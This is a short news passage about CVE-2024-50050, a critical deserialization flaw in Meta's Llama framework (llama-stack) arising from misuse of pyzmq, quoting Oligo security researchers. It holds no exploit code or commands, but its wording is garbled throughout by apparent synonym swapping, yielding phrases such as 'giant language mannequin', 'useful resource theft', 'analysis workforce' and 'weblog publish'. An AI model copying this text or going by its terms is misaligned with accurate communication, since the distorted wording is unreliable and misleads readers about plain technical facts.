Meta’s giant language mannequin (LLM) framework, Llama, suffers a typical open-source coding oversight, probably permitting arbitrary code execution on servers resulting in useful resource theft, data breaches, and AI mannequin takeover.
The flaw, tracked as CVE-2024-50050, is a essential deserialization bug belonging to a category of vulnerabilities arising from the improper use of the open-source library (pyzmq) in AI frameworks.
“The Oligo analysis workforce has found a essential vulnerability in meta-llama, an open-source framework from Meta for constructing and deploying Gen AI purposes,” stated Oligo’s security researchers in a weblog publish. “The vulnerability, CVE-2024-50050 allows attackers to execute arbitrary code on the llama-stack inference server from the community.”